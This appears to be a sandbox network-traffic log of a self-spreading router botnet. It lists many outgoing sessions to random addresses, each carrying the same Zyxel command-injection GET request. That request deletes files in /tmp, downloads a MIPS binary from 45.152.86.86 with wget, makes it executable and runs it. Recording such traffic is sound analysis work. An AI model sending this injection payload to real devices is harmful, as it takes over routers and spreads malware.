                              Mar 31, 2024 08:41:28.882436991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4747192.168.2.1360652113.11.106.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882488012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4748192.168.2.134524062.192.191.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882510900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4749192.168.2.1333528169.162.200.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882565022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4750192.168.2.135486438.245.193.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882605076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4751192.168.2.1335178212.238.11.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882646084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4752192.168.2.135277478.233.246.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882699013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4753192.168.2.1358730117.15.174.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882726908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4754192.168.2.134192086.106.245.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882785082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4755192.168.2.1360576116.100.200.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882805109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4756192.168.2.133582248.234.36.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882833004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4757192.168.2.13486625.244.126.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882899046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4758192.168.2.1359414194.60.27.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882917881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4759192.168.2.134710499.158.18.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.882961035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4760192.168.2.1339214206.87.26.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883021116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4761192.168.2.1333080152.125.142.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883044958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4762192.168.2.133445860.238.124.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883095026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4763192.168.2.135848017.11.32.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883130074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4764192.168.2.1336340110.149.69.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883164883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4765192.168.2.1349396216.153.63.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883203983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4766192.168.2.1352386131.8.229.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883235931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4767192.168.2.135213217.220.242.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883300066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4768192.168.2.1334618145.221.51.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883336067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4769192.168.2.134629863.32.200.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883354902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4770192.168.2.133877690.114.191.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883383989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4771192.168.2.1339248116.249.96.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883426905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4772192.168.2.134592672.181.73.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883455992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4773192.168.2.134132462.16.112.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883507013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4774192.168.2.135369661.105.247.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883558035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4775192.168.2.133282020.43.128.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883608103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4776192.168.2.1355168208.151.133.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883640051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4777192.168.2.1349592189.62.124.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883652925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4778192.168.2.1340744191.79.45.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883708000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4779192.168.2.134408634.148.187.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883744955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4780192.168.2.133927643.149.248.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883770943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4781192.168.2.1340308177.154.103.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883802891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4782192.168.2.13483801.68.81.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883826971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4783192.168.2.1360684217.32.113.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883860111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4784192.168.2.134347889.167.49.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883919001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4785192.168.2.1349972145.184.9.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.883953094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4786192.168.2.13441445.144.177.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884001017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4787192.168.2.1353318139.122.213.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884037018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4788192.168.2.133594096.150.221.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884078979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4789192.168.2.134277236.154.117.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884111881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4790192.168.2.1340212137.42.48.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884156942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4791192.168.2.134578041.224.157.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884181023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4792192.168.2.1348418104.146.47.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884223938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4793192.168.2.134096838.137.176.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884268999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4794192.168.2.1347270163.31.230.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884301901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4795192.168.2.133482287.38.116.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884346008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4796192.168.2.1351868133.169.117.143443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884417057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4797192.168.2.1350908165.43.161.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884438038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4798192.168.2.133295012.10.228.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884470940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4799192.168.2.134555263.3.245.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884541988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4800192.168.2.134421092.45.232.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884568930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4801192.168.2.1342568200.148.220.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884591103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4802192.168.2.1353058118.117.140.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884637117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4803192.168.2.1343402157.176.137.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884677887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4804192.168.2.1342448204.65.123.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884694099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4805192.168.2.135162887.123.32.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884747982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4806192.168.2.1333264160.243.249.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884783983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4807192.168.2.1358096185.152.31.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884814978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4808192.168.2.1344170135.242.162.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884860992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4809192.168.2.1335050219.16.107.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884911060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4810192.168.2.134800070.93.111.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884958982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4811192.168.2.1333732153.93.29.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.884994030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4812192.168.2.134684654.82.78.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885030985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4813192.168.2.135101066.21.226.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885087013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4814192.168.2.1350586222.181.120.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.885130882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4815192.168.2.133467898.16.38.177443
                              TimestampBytes transferredDirectionData
